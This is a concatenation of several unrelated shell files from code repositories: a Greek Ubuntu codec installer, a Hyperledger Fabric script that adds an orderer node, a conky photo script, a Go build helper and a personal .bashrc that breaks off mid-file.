while [ -z "$PASS" ]; do
if ! PASS=$(zenity --entry --title="Έλεγχος Διαχειρηστή" --width=350 --hide-text --text="Πληκτρολογήστε τον κωδικό σας" ) ; then
FAIL="YES"
fi
done
echo "$PASS" | sudo -S -p "" /bin/true 2> "/dev/null"
if [ "$?" = "1" ]; then
FAIL="YES"
$DISPLAYSTATUS
PASS=""
else
$DISPLAYSTATUS
break
fi
done
# =============================================================================================================
# Release/architecture picker; each branch below adds the Medibuntu repo (and
# a PPA where needed), then installs the codec/Java/Flash package set for that
# release. The branches differ in release codename, w32/w64 codecs and the
# Flash packages.
ANS=$(zenity --title='uCodecsPack' --list --text "Επιλέξτε την έκδοση του Ubuntu που διαθέτετε" --radiolist --height=280 --width=350 --column "Επιλογή" --column "Έκδοση/Αρχιτεκτονική" TRUE '10.04/i386' FALSE '10.04/amd64' FALSE '10.10/i386' FALSE '10.10/amd64' FALSE '11.04/i386' FALSE '11.04/amd64'); echo $ans
if [ "$ANS" = "10.04/i386" ]; then
echo "$PASS" | sudo -S -p "" echo deb http://packages.medibuntu.org/ lucid free non-free | sudo tee -a /etc/apt/sources.list && echo deb-src http://packages.medibuntu.org/ lucid free non-free | sudo tee -a /etc/apt/sources.list && wget -q http://packages.medibuntu.org/medibuntu-key.gpg -O- | sudo apt-key add - && sudo add-apt-repository ppa:ferramroberto/vlc && sudo apt-get update && sudo apt-get install -y --force-yes w32codecs non-free-codecs sun-java6-bin sun-java6-jre sun-java6-javadb sun-java6-jdk sun-java6-plugin sun-java6-fonts flashplugin-nonfree flashplugin-installer flashplugin-nonfree-extrasound ffmpeg vlc libdvdcss2 ubuntu-restricted-extras && sudo apt-get update >> "/dev/null" 2>&1
zenity --info --title='uCodecsPack' \
--text="Η εγκατάσταση έχει ολοκληρωθεί."
fi
if [ "$ANS" = "10.04/amd64" ]; then
echo "$PASS" | sudo -S -p "" echo deb http://packages.medibuntu.org/ lucid free non-free | sudo tee -a /etc/apt/sources.list && echo deb-src http://packages.medibuntu.org/ lucid free non-free | sudo tee -a /etc/apt/sources.list && wget -q http://packages.medibuntu.org/medibuntu-key.gpg -O- | sudo apt-key add - && sudo add-apt-repository ppa:ferramroberto/vlc && sudo apt-get update && sudo apt-get install -y --force-yes w64codecs non-free-codecs sun-java6-bin sun-java6-jre sun-java6-javadb sun-java6-jdk sun-java6-plugin sun-java6-fonts flashplugin-nonfree flashplugin-installer ffmpeg vlc libdvdcss2 ubuntu-restricted-extras && sudo apt-get update >> "/dev/null" 2>&1
zenity --info --title='uCodecsPack' \
--text="Η εγκατάσταση έχει ολοκληρωθεί."
fi
if [ "$ANS" = "10.10/i386" ]; then
echo "$PASS" | sudo -S -p "" echo deb http://packages.medibuntu.org/ maverick free non-free | sudo tee -a /etc/apt/sources.list && echo deb-src http://packages.medibuntu.org/ maverick free non-free | sudo tee -a /etc/apt/sources.list && wget -q http://packages.medibuntu.org/medibuntu-key.gpg -O- | sudo apt-key add - && sudo add-apt-repository ppa:ferramroberto/vlc && sudo apt-get update && sudo apt-get install -y --force-yes w32codecs non-free-codecs sun-java6-bin sun-java6-jre sun-java6-javadb sun-java6-jdk sun-java6-plugin sun-java6-fonts flashplugin-nonfree flashplugin-installer flashplugin-nonfree-extrasound ffmpeg vlc libdvdcss2 ubuntu-restricted-extras && sudo apt-get update >> "/dev/null" 2>&1
zenity --info --title='uCodecsPack' \
--text="Η εγκατάσταση έχει ολοκληρωθεί."
fi
if [ "$ANS" = "10.10/amd64" ]; then
echo "$PASS" | sudo -S -p "" echo deb http://packages.medibuntu.org/ maverick free non-free | sudo tee -a /etc/apt/sources.list && echo deb-src http://packages.medibuntu.org/ maverick free non-free | sudo tee -a /etc/apt/sources.list && wget -q http://packages.medibuntu.org/medibuntu-key.gpg -O- | sudo apt-key add - && sudo add-apt-repository ppa:ferramroberto/vlc && sudo apt-get update && sudo apt-get install -y --force-yes w64codecs non-free-codecs sun-java6-bin sun-java6-jre sun-java6-javadb sun-java6-jdk sun-java6-plugin sun-java6-fonts flashplugin-nonfree flashplugin-installer ffmpeg vlc libdvdcss2 ubuntu-restricted-extras && sudo apt-get update >> "/dev/null" 2>&1
zenity --info --title='uCodecsPack' \
--text="Η εγκατάσταση έχει ολοκληρωθεί."
fi
if [ "$ANS" = "11.04/i386" ]; then
echo "$PASS" | sudo -S -p "" echo deb http://packages.medibuntu.org/ natty free non-free | sudo tee -a /etc/apt/sources.list && echo deb-src http://packages.medibuntu.org/ natty free non-free | sudo tee -a /etc/apt/sources.list && wget -q http://packages.medibuntu.org/medibuntu-key.gpg -O- | sudo apt-key add - && sudo apt-get update && sudo apt-get install -y --force-yes w32codecs non-free-codecs sun-java6-bin sun-java6-jre sun-java6-javadb sun-java6-jdk sun-java6-plugin sun-java6-fonts flashplugin-nonfree flashplugin-installer ffmpeg vlc libdvdcss2 ubuntu-restricted-extras && sudo apt-get update >> "/dev/null" 2>&1
zenity --info --title='uCodecsPack' \
--text="Η εγκατάσταση έχει ολοκληρωθεί."
fi
# BUG NOTE(review): in the branch below a "&&" is missing between
# "sudo apt-key add -" and "sudo add-apt-repository", so add-apt-repository
# is passed as an argument to apt-key and the flash PPA is never added.
if [ "$ANS" = "11.04/amd64" ]; then
echo "$PASS" | sudo -S -p "" echo deb http://packages.medibuntu.org/ natty free non-free | sudo tee -a /etc/apt/sources.list && echo deb-src http://packages.medibuntu.org/ natty free non-free | sudo tee -a /etc/apt/sources.list && wget -q http://packages.medibuntu.org/medibuntu-key.gpg -O- | sudo apt-key add - sudo add-apt-repository ppa:sevenmachines/flash && sudo apt-get update && sudo apt-get install -y --force-yes w64codecs non-free-codecs sun-java6-bin sun-java6-jre sun-java6-javadb sun-java6-jdk sun-java6-plugin sun-java6-fonts flashplugin64-installer ffmpeg vlc libdvdcss2 ubuntu-restricted-extras && sudo apt-get update >> "/dev/null" 2>&1
zenity --info --title='uCodecsPack' \
--text="Η εγκατάσταση έχει ολοκληρωθεί."
fi
exit 0
| true
|
565255012c743f6b06ddc90a2f61c3db8004db71
|
Shell
|
Sumitvedpathak/hf-network-boilerplate
|
/artifacts/orderer/artifacts.sh
|
UTF-8
| 11,901
| 2.75
| 3
|
[] |
no_license
|
# Add a fourth Raft orderer (orderer4.example.com:10050) to an existing
# Hyperledger Fabric network: extend the consenter set and orderer address
# list of both the system channel and the application channel, fetch the
# genesis block, and start the new orderer container.
export TEMP_FOLDER_PATH1=./channel/temp1
export TEMP_FOLDER_PATH2=./channel/temp2
export TEMP_FOLDER_PATH3=./channel/temp3
export TEMP_FOLDER_PATH4=./channel/temp4
export CORE_PEER_TLS_ENABLED=true
export ORDERER_CA=${PWD}/../../artifacts/channel/crypto-config/ordererOrganizations/example.com/orderers/orderer.example.com/msp/tlscacerts/tlsca.example.com-cert.pem
export PEER0_ORG1_CA=${PWD}/../../artifacts/channel/crypto-config/peerOrganizations/org1.example.com/peers/peer0.org1.example.com/tls/ca.crt
export PEER0_ORG2_CA=${PWD}/../../artifacts/channel/crypto-config/peerOrganizations/org2.example.com/peers/peer0.org2.example.com/tls/ca.crt
export FABRIC_CFG_PATH=${PWD}/../../artifacts/config/
export ORDERER4_TLS_FILE=${PWD}/../../artifacts/channel/crypto-config/ordererOrganizations/example.com/orderers/orderer4.example.com/tls/server.crt
export CHANNEL_NAME=mychannel
export SYSTEM_CHANNEL_NAME=sys-channel
# Point the peer CLI at the orderer org admin identity.
setGlobalsForOrderer() {
export CORE_PEER_LOCALMSPID="OrdererMSP"
export CORE_PEER_TLS_ROOTCERT_FILE=${PWD}/../../artifacts/channel/crypto-config/ordererOrganizations/example.com/orderers/orderer.example.com/msp/tlscacerts/tlsca.example.com-cert.pem
export CORE_PEER_MSPCONFIGPATH=${PWD}/../../artifacts/channel/crypto-config/ordererOrganizations/example.com/users/Admin@example.com/msp
}
# Point the peer CLI at Org2's admin identity and peer0 endpoint.
setGlobalsForPeer0Org2() {
export CORE_PEER_LOCALMSPID="Org2MSP"
export CORE_PEER_TLS_ROOTCERT_FILE=$PEER0_ORG2_CA
export CORE_PEER_MSPCONFIGPATH=${PWD}/../../artifacts/channel/crypto-config/peerOrganizations/org2.example.com/users/Admin@org2.example.com/msp
export CORE_PEER_ADDRESS=localhost:9051
}
# generateCryptoMaterial(){
# echo "---------------------------Generating Crypto Material for new Organization 4---------------------------"
# cryptogen generate --config=./crypto-config.yaml --output=./channel/crypto-config/
# }
# generateCryptoMaterial
# Standard Fabric config-update dance on the SYSTEM channel: fetch the
# current config block, decode it, append orderer4 to the Raft consenter
# metadata, compute + encode the delta, wrap it in an envelope and submit.
# The exact decode/encode/compute_update ordering is required by configtxlator.
addOrderer4ToConcenterListAndSystemChannel() {
echo "---------------------------Updating Concenter list with new Orderer 4 and adding it into System Channel---------------------------"
setGlobalsForOrderer
peer channel fetch config $TEMP_FOLDER_PATH1/config_block.pb -o localhost:7050 \
--ordererTLSHostnameOverride orderer.example.com \
-c $SYSTEM_CHANNEL_NAME --tls --cafile $ORDERER_CA
configtxlator proto_decode --input $TEMP_FOLDER_PATH1/config_block.pb \
--type common.Block | jq .data.data[0].payload.data.config >$TEMP_FOLDER_PATH1/config.json
echo "{\"client_tls_cert\":\"$(cat $ORDERER4_TLS_FILE | base64 -w 0)\",\"host\":\"orderer4.example.com\",\"port\":10050,\"server_tls_cert\":\"$(cat $ORDERER4_TLS_FILE | base64 -w 0)\"}" >$TEMP_FOLDER_PATH1/org4consenter.json
jq ".channel_group.groups.Orderer.values.ConsensusType.value.metadata.consenters += [$(cat $TEMP_FOLDER_PATH1/org4consenter.json)]" $TEMP_FOLDER_PATH1/config.json >$TEMP_FOLDER_PATH1/modified_config.json
configtxlator proto_encode --input $TEMP_FOLDER_PATH1/config.json --type common.Config --output $TEMP_FOLDER_PATH1/config.pb
configtxlator proto_encode --input $TEMP_FOLDER_PATH1/modified_config.json --type common.Config --output $TEMP_FOLDER_PATH1/modified_config.pb
configtxlator compute_update --channel_id $SYSTEM_CHANNEL_NAME --original $TEMP_FOLDER_PATH1/config.pb --updated $TEMP_FOLDER_PATH1/modified_config.pb --output $TEMP_FOLDER_PATH1/config_update.pb
configtxlator proto_decode --input $TEMP_FOLDER_PATH1/config_update.pb --type common.ConfigUpdate --output $TEMP_FOLDER_PATH1/config_update.json
echo "{\"payload\":{\"header\":{\"channel_header\":{\"channel_id\":\"sys-channel\", \"type\":2}},\"data\":{\"config_update\":"$(cat $TEMP_FOLDER_PATH1/config_update.json)"}}}" | jq . >$TEMP_FOLDER_PATH1/config_update_in_envelope.json
configtxlator proto_encode --input $TEMP_FOLDER_PATH1/config_update_in_envelope.json --type common.Envelope --output $TEMP_FOLDER_PATH1/config_update_in_envelope.pb
peer channel update -f $TEMP_FOLDER_PATH1/config_update_in_envelope.pb -c $SYSTEM_CHANNEL_NAME -o localhost:7050 --tls --cafile $ORDERER_CA
}
# addOrderer4ToConcenterListAndSystemChannel
# Fetch the (latest config of the) system channel as the bootstrap block the
# new orderer will start from.
getOrdererGenesisBlock() {
echo "---------------------------Fetching Genesis Block---------------------------"
setGlobalsForOrderer
peer channel fetch config ./channel/genesis.block -o localhost:7050 -c $SYSTEM_CHANNEL_NAME --tls --cafile $ORDERER_CA
}
# getOrdererGenesisBlock
# Start the orderer4 container (docker-compose.yaml in this directory).
runOrderere4Container(){
echo "---------------------------Running Orderer 4 Containers---------------------------"
source .env
docker-compose -f ./docker-compose.yaml up -d
}
# runOrderere4Container
# Same config-update dance, this time appending orderer4's endpoint to the
# system channel's OrdererAddresses list.
addOrderer4AddressAndInSystemChannel() {
echo "---------------------------Updating Address list with new Orderer 4 address and adding it into System Channel---------------------------"
setGlobalsForOrderer
peer channel fetch config $TEMP_FOLDER_PATH2/config_block.pb -o localhost:7050 -c $SYSTEM_CHANNEL_NAME --tls --cafile $ORDERER_CA
configtxlator proto_decode --input $TEMP_FOLDER_PATH2/config_block.pb --type common.Block | jq .data.data[0].payload.data.config >$TEMP_FOLDER_PATH2/config.json
jq ".channel_group.values.OrdererAddresses.value.addresses += [\"orderer4.example.com:10050\"]" $TEMP_FOLDER_PATH2/config.json >$TEMP_FOLDER_PATH2/modified_config.json
configtxlator proto_encode --input $TEMP_FOLDER_PATH2/config.json --type common.Config --output $TEMP_FOLDER_PATH2/config.pb
configtxlator proto_encode --input $TEMP_FOLDER_PATH2/modified_config.json --type common.Config --output $TEMP_FOLDER_PATH2/modified_config.pb
configtxlator compute_update --channel_id $SYSTEM_CHANNEL_NAME --original $TEMP_FOLDER_PATH2/config.pb --updated $TEMP_FOLDER_PATH2/modified_config.pb --output $TEMP_FOLDER_PATH2/config_update.pb
configtxlator proto_decode --input $TEMP_FOLDER_PATH2/config_update.pb --type common.ConfigUpdate --output $TEMP_FOLDER_PATH2/config_update.json
echo "{\"payload\":{\"header\":{\"channel_header\":{\"channel_id\":\"sys-channel\", \"type\":2}},\"data\":{\"config_update\":"$(cat $TEMP_FOLDER_PATH2/config_update.json)"}}}" | jq . >$TEMP_FOLDER_PATH2/config_update_in_envelope.json
configtxlator proto_encode --input $TEMP_FOLDER_PATH2/config_update_in_envelope.json --type common.Envelope --output $TEMP_FOLDER_PATH2/config_update_in_envelope.pb
peer channel update -f $TEMP_FOLDER_PATH2/config_update_in_envelope.pb -c $SYSTEM_CHANNEL_NAME -o localhost:7050 --tls true --cafile $ORDERER_CA
}
# addOrderer4AddressAndInSystemChannel
# Append orderer4 to the Raft consenter metadata of the APPLICATION channel.
addOrderer4ToConcenterListAndApplicationChannel(){
setGlobalsForOrderer
echo "---------------------------Updating Concenter list with new Orderer 4 and adding it into Application Channel---------------------------"
peer channel fetch config $TEMP_FOLDER_PATH3/config_block.pb -o localhost:7050 -c $CHANNEL_NAME --tls --cafile $ORDERER_CA
configtxlator proto_decode --input $TEMP_FOLDER_PATH3/config_block.pb --type common.Block | jq .data.data[0].payload.data.config >$TEMP_FOLDER_PATH3/config.json
echo "{\"client_tls_cert\":\"$(cat $ORDERER4_TLS_FILE | base64 -w 0)\",\"host\":\"orderer4.example.com\",\"port\":10050,\"server_tls_cert\":\"$(cat $ORDERER4_TLS_FILE | base64 -w 0)\"}" >$TEMP_FOLDER_PATH3/orderer4consenter.json
jq ".channel_group.groups.Orderer.values.ConsensusType.value.metadata.consenters += [$(cat $TEMP_FOLDER_PATH3/orderer4consenter.json)]" $TEMP_FOLDER_PATH3/config.json >$TEMP_FOLDER_PATH3/modified_config.json
configtxlator proto_encode --input $TEMP_FOLDER_PATH3/config.json --type common.Config --output $TEMP_FOLDER_PATH3/config.pb
configtxlator proto_encode --input $TEMP_FOLDER_PATH3/modified_config.json --type common.Config --output $TEMP_FOLDER_PATH3/modified_config.pb
configtxlator compute_update --channel_id $CHANNEL_NAME --original $TEMP_FOLDER_PATH3/config.pb --updated $TEMP_FOLDER_PATH3/modified_config.pb --output $TEMP_FOLDER_PATH3/config_update.pb
configtxlator proto_decode --input $TEMP_FOLDER_PATH3/config_update.pb --type common.ConfigUpdate --output $TEMP_FOLDER_PATH3/config_update.json
echo "{\"payload\":{\"header\":{\"channel_header\":{\"channel_id\":\"mychannel\", \"type\":2}},\"data\":{\"config_update\":"$(cat $TEMP_FOLDER_PATH3/config_update.json)"}}}" | jq . >$TEMP_FOLDER_PATH3/config_update_in_envelope.json
configtxlator proto_encode --input $TEMP_FOLDER_PATH3/config_update_in_envelope.json --type common.Envelope --output $TEMP_FOLDER_PATH3/config_update_in_envelope.pb
peer channel update -f $TEMP_FOLDER_PATH3/config_update_in_envelope.pb -c mychannel -o localhost:7050 --tls true --cafile $ORDERER_CA
}
# addOrderer4ToConcenterListAndApplicationChannel
# Append orderer4's endpoint to the application channel's OrdererAddresses.
# NOTE(review): function name has a typo ("Applicationhannel") and it is
# never invoked in the run sequence at the bottom of this file.
addOrderer4AddressAndInApplicationhannel() {
echo "---------------------------Updating Address list with new Orderer 4 address and adding it into Application Channel---------------------------"
setGlobalsForOrderer
peer channel fetch config $TEMP_FOLDER_PATH4/config_block.pb -o localhost:7050 -c $CHANNEL_NAME --tls --cafile $ORDERER_CA
configtxlator proto_decode --input $TEMP_FOLDER_PATH4/config_block.pb --type common.Block | jq .data.data[0].payload.data.config >$TEMP_FOLDER_PATH4/config.json
jq ".channel_group.values.OrdererAddresses.value.addresses += [\"orderer4.example.com:10050\"]" $TEMP_FOLDER_PATH4/config.json >$TEMP_FOLDER_PATH4/modified_config.json
configtxlator proto_encode --input $TEMP_FOLDER_PATH4/config.json --type common.Config --output $TEMP_FOLDER_PATH4/config.pb
configtxlator proto_encode --input $TEMP_FOLDER_PATH4/modified_config.json --type common.Config --output $TEMP_FOLDER_PATH4/modified_config.pb
configtxlator compute_update --channel_id $CHANNEL_NAME --original $TEMP_FOLDER_PATH4/config.pb --updated $TEMP_FOLDER_PATH4/modified_config.pb --output $TEMP_FOLDER_PATH4/config_update.pb
configtxlator proto_decode --input $TEMP_FOLDER_PATH4/config_update.pb --type common.ConfigUpdate --output $TEMP_FOLDER_PATH4/config_update.json
echo "{\"payload\":{\"header\":{\"channel_header\":{\"channel_id\":\"$CHANNEL_NAME\", \"type\":2}},\"data\":{\"config_update\":"$(cat $TEMP_FOLDER_PATH4/config_update.json)"}}}" | jq . >$TEMP_FOLDER_PATH4/config_update_in_envelope.json
configtxlator proto_encode --input $TEMP_FOLDER_PATH4/config_update_in_envelope.json --type common.Envelope --output $TEMP_FOLDER_PATH4/config_update_in_envelope.pb
peer channel update -f $TEMP_FOLDER_PATH4/config_update_in_envelope.pb -c $CHANNEL_NAME -o localhost:7050 --tls true --cafile $ORDERER_CA
}
# addOrderer4ToConcenterListAndApplicationChannel
# Smoke test: invoke the fabcar chaincode as Org2 (create a car, then query
# it back) to confirm the channel still orders transactions.
chaincodeQuery() {
echo "---------------------------Quering Chaincode by Peer 0 of Org 2---------------------------"
setGlobalsForPeer0Org2
# export CAR=$(echo -n "{\"key\":\"1111\", \"make\":\"Hyundai\",\"model\":\"Tucson\",\"color\":\"Gray\",\"owner\":\"Sumit\",\"price\":\"22000\"}" | base64 | tr -d \\n)
peer chaincode invoke -o localhost:7050 \
--ordererTLSHostnameOverride orderer.example.com \
--tls $CORE_PEER_TLS_ENABLED \
--cafile $ORDERER_CA \
-C $CHANNEL_NAME -n "fabcar" \
--peerAddresses localhost:7051 \
--tlsRootCertFiles $PEER0_ORG1_CA \
--peerAddresses localhost:9051 \
--tlsRootCertFiles $PEER0_ORG2_CA \
-c '{"function": "createCar", "Args":["CAR_ls","Hyundai", "Palisade", "Gray", "Sumit"]}'
# Query Car by Id
peer chaincode query -C $CHANNEL_NAME -n "fabcar" -c '{"function": "queryCar","Args":["CAR_ls"]}'
}
# generateCryptoMaterial
# Run sequence: consenter first, then bootstrap block, container start,
# address updates; chaincodeQuery left disabled.
addOrderer4ToConcenterListAndSystemChannel
getOrdererGenesisBlock
runOrderere4Container
addOrderer4AddressAndInSystemChannel
addOrderer4ToConcenterListAndApplicationChannel
# chaincodeQuery
| true
|
855b8084f02ea49aa31ad84610b956e636e8eeea
|
Shell
|
wwchang/dotfiles
|
/.conky/resources/scripts/conkyPhotoRandom
|
UTF-8
| 1,553
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Photo in conky
# by helmuthdu and paulvictor
#
# Picks a random image from ~/.conky/images/ and renders it into $photo
# with rounded corners and a drop shadow (requires ImageMagick).
photo=~/.conky/images/cute_boy.png
# Work inside the image directory; bail out if it is missing so the
# ImageMagick pipeline never runs against the wrong directory.
cd ~/.conky/images/ || exit 1
# Pick one entry at random.  A glob instead of `ls -R | wc -l` avoids
# miscounting with subdirectories/whitespace, and indexing the array
# directly removes the old bias of `head -n $((r%n+2)) | tail -n 1`,
# which skipped the first file and over-selected the last.
files=(*)
number=${#files[@]}
[ "$number" -gt 0 ] || exit 1
filename=${files[RANDOM % number]}
cp -- "$filename" "$photo"
# width - height: ~0 => nearly square, >0 => landscape, <0 => portrait.
picture_aspect=$(( $(identify -format %w "$photo") - $(identify -format %h "$photo") ))
if [ "$picture_aspect" -lt "100" ] && [ "$picture_aspect" -gt "-100" ]; then
    # Nearly square: scale as portrait and crop vertically to 175x125.
    convert "$photo" -thumbnail 175x280 "$photo"
    convert "$photo" -crop 175x125+0+$(( ($(identify -format %h "$photo") - 180) / 2)) +repage "$photo"
elif [ "$picture_aspect" -gt "0" ]; then
    # Landscape: scale wide and crop horizontally.
    convert "$photo" -thumbnail 280x175 "$photo"
    convert "$photo" -crop 175x125+$(( ($(identify -format %w "$photo") - $picture_aspect*2) / 2))+0 +repage "$photo"
else
    # Portrait: scale tall and crop vertically.
    convert "$photo" -thumbnail 175x280 "$photo"
    convert "$photo" -crop 175x125+0+$(( ($(identify -format %h "$photo") - 180) / 2)) +repage "$photo"
fi
# Theme 1: rounded corners + drop shadow.
convert "$photo" \( +clone -threshold -1 -draw 'fill black polygon 0,0 0,10 10,0 fill white circle 10,10 10,0' \( +clone -flip \) -compose Multiply -composite \( +clone -flop \) -compose Multiply -composite \) +matte -compose CopyOpacity -composite "$photo"
convert -page +2+3 "$photo" -matte \( +clone -background black -shadow 50x3+0+0 \) +swap -background none -mosaic "$photo"
# Theme 2
#convert -page +2+3 $photo -bordercolor black -border 1 -background none -rotate 0 -background black \( +clone -shadow 50x3+0+0 \) +swap -background none -flatten $photo
exit 0
| true
|
2d95f2b43b071282e1bcbe25ebfc1b4a516d0a56
|
Shell
|
tfwio/session
|
/do
|
UTF-8
| 287
| 2.5625
| 3
|
[
"MIT"
] |
permissive
|
#! /usr/bin/env bash
# Build helper: each argument selects an example target to (re)build.
#   cli       -> ./examples/cli
#   gin | srv -> ./examples/srv
build_example() {
  # Announce and run `go clean` followed by `go build` for one package.
  echo go clean
  go clean
  echo go build "$1"
  go build "$1"
}
for target in ${@}; do
  case "$target" in
    cli) build_example ./examples/cli ;;
    gin|srv) build_example ./examples/srv ;;
  esac
done
| true
|
5abf53efd1c6b59501bd24045de7bc30deec37a4
|
Shell
|
gouf/dotfiles
|
/.bashrc
|
UTF-8
| 7,251
| 3.265625
| 3
|
[
"MIT"
] |
permissive
|
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
# ($- contains the letter 'i' only in interactive shells)
case $- in
*i*) ;;
*) return;;
esac
# macOS-only ls color settings.
# NB: the old test used `-eq`, which is *arithmetic* comparison inside
# [[ ]]; non-numeric strings evaluate to 0, so the condition was true on
# every OS.  String equality (==) restricts this branch to Darwin.
if [[ $(uname -s) == 'Darwin' ]]; then
export LSCOLORS=gxfxcxdxbxegedabagacad
export LS_COLORS="di=36;40:ln=35:so=32:pi=33:ex=31:bd=34;46:cd=34;43:su=30;41:sg=30;46:tw=36;42:ow=30;43"
fi
# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
# HISTCONTROL=ignoreboth
# erasedups additionally removes older duplicates when a command repeats.
HISTCONTROL=ignoreboth:erasedups
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=100000
# NOTE(review): SAVEHIST is zsh's history-size variable; bash uses
# HISTFILESIZE — confirm this line is intentional.
SAVEHIST=1000000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
# We have color support; assume it's compliant with Ecma-48
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
# a case would tend to support setf rather than setaf.)
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# functions type commands
if [ -f ~/.bash_functions ]; then
. ~/.bash_functions
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
if [ -f /usr/share/bash-completion/bash_completion ]; then
. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi
# git - https://github.com/git/git/tree/master/contrib/completion
GIT_PS1_SHOWDIRTYSTATE=true
# Git-aware prompt: cyan working directory on macOS, blue elsewhere.
# `==` (string comparison) replaces the old `-eq`, which compared
# arithmetically — non-numeric strings evaluate to 0, making the Darwin
# branch unconditionally true on every OS.
if [[ $(uname -s) == 'Darwin' ]]; then
export PS1='\[\033[32m\]\u@\h\[\033[00m\]:\[\033[36m\]\w\[\033[31m\]$(__git_ps1)\[\033[00m\]\$ '
else
export PS1='\[\033[32m\]\u@\h\[\033[00m\]:\[\033[34m\]\w\[\033[31m\]$(__git_ps1)\[\033[00m\]\$ '
fi
# hub - https://github.com/github/hub/
export PATH=~/.local/bin:$PATH
eval "$(hub alias -s)"
# Homebrew bash completion (macOS only; `==` is valid in bash's [ here).
if [ $(uname -s) == "Darwin" ]; then
if [ -f $(brew --prefix)/etc/bash_completion ]; then
. $(brew --prefix)/etc/bash_completion
fi
fi
if [ -f $HOME/git-prompt.sh ]; then
source $HOME/git-prompt.sh
fi
export PATH="$HOME/.anyenv/bin:$PATH"
eval "$(anyenv init -)"
export EDITOR="vim"
export MAKE_OPTS=-j4
source ~/.anyenv/completions/anyenv.bash
### Added by the Heroku Toolbelt
export PATH="/usr/local/heroku/bin:$PATH"
# Load pyenv
export PATH="$HOME/.pyenv/bin:$PATH"
eval "$(pyenv init --path)"
# Go workspace
export GOPATH="$HOME/.golang"
export GOBIN="$GOPATH/bin"
export PATH="$GOPATH/bin:$PATH"
export PATH="$GOROOT/bin:$PATH"
export PATH="~/.cabal/bin:/opt/cabal/1.20/bin:/opt/ghc/7.8.4/bin:$PATH"
export PATH="~/.terraform:$PATH"
# npm global packages in $HOME (no sudo installs)
export NPM_PACKAGES="$HOME/.npm-packages"
export NODE_PATH="$NPM_PACKAGES/lib/node_modules:$NODE_PATH"
PATH="$NPM_PACKAGES/bin:$PATH"
# Unset manpath so we can inherit from /etc/manpath via the `manpath`
# command
unset MANPATH # delete if you already modified MANPATH elsewhere in your config
export MANPATH="$NPM_PACKAGES/share/man:$(manpath)"
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh"  # This loads nvm
# NOTE(review): anyenv PATH/init is duplicated — the same two lines
# already ran earlier in this file; probably removable.
export PATH="$HOME/.anyenv/bin:$PATH"
eval "$(anyenv init -)"
export PATH="$HOME/swift-2.2-SNAPSHOT-2015-12-21-a-ubuntu15.10/usr/bin:$PATH"
# added by travis gem
[ -f $HOME/.travis/travis.sh ] && source $HOME/.travis/travis.sh
export ANDROID_HOME="/usr/local/Cellar/android-sdk/24.4.1_1/"
#THIS MUST BE AT THE END OF THE FILE FOR SDKMAN TO WORK!!!
export SDKMAN_DIR="$HOME/.sdkman"
[[ -s "$HOME/.sdkman/bin/sdkman-init.sh" ]] && source "$HOME/.sdkman/bin/sdkman-init.sh"
export GRADLE_USER_HOME="/usr/local/opt/gradle/libexec"
export PATH="$HOME/.chefdk/gem/ruby/2.3.0/bin:$PATH"
export PATH="$HOME/.local/bin:$PATH"
# bashmarks - https://github.com/huyng/bashmarks
# bash directory bookmark
if [ -f ~/.local/bin/bashmarks.sh ]; then
source ~/.local/bin/bashmarks.sh
fi
if [ -f ~/.homebrew_github_api_token ]; then
source ~/.homebrew_github_api_token
fi
export PATH="$HOME/.config/composer/vendor/bin:$PATH"
export GPG_TTY=$(tty)
eval "$(pipenv --completion)"
# heroku autocomplete setup
CLI_ENGINE_AC_BASH_SETUP_PATH=$HOME/.cache/heroku/completions/bash_setup && test -f $CLI_ENGINE_AC_BASH_SETUP_PATH && source $CLI_ENGINE_AC_BASH_SETUP_PATH;
#
# enhancd settings
# Ref: https://github.com/b4b4r07/enhancd
#
if [ -f ~/.enhancd/init.sh ]; then
# export ENHANCD_COMMAND=ecd # Default command modification
export ENHANCD_FILTER="peco"
export ENHANCD_DOT_SHOW_FULLPATH=1
export ENHANCD_DISABLE_DOT=0 # Default: 0
export ENHANCD_DISABLE_HYPHEN=0 # Default: 0
export ENHANCD_DISABLE_HOME=0 # Default: 0
export ENHANCD_DOT_ARG=".." # Default: "..", If set, that behavior same act as original cd
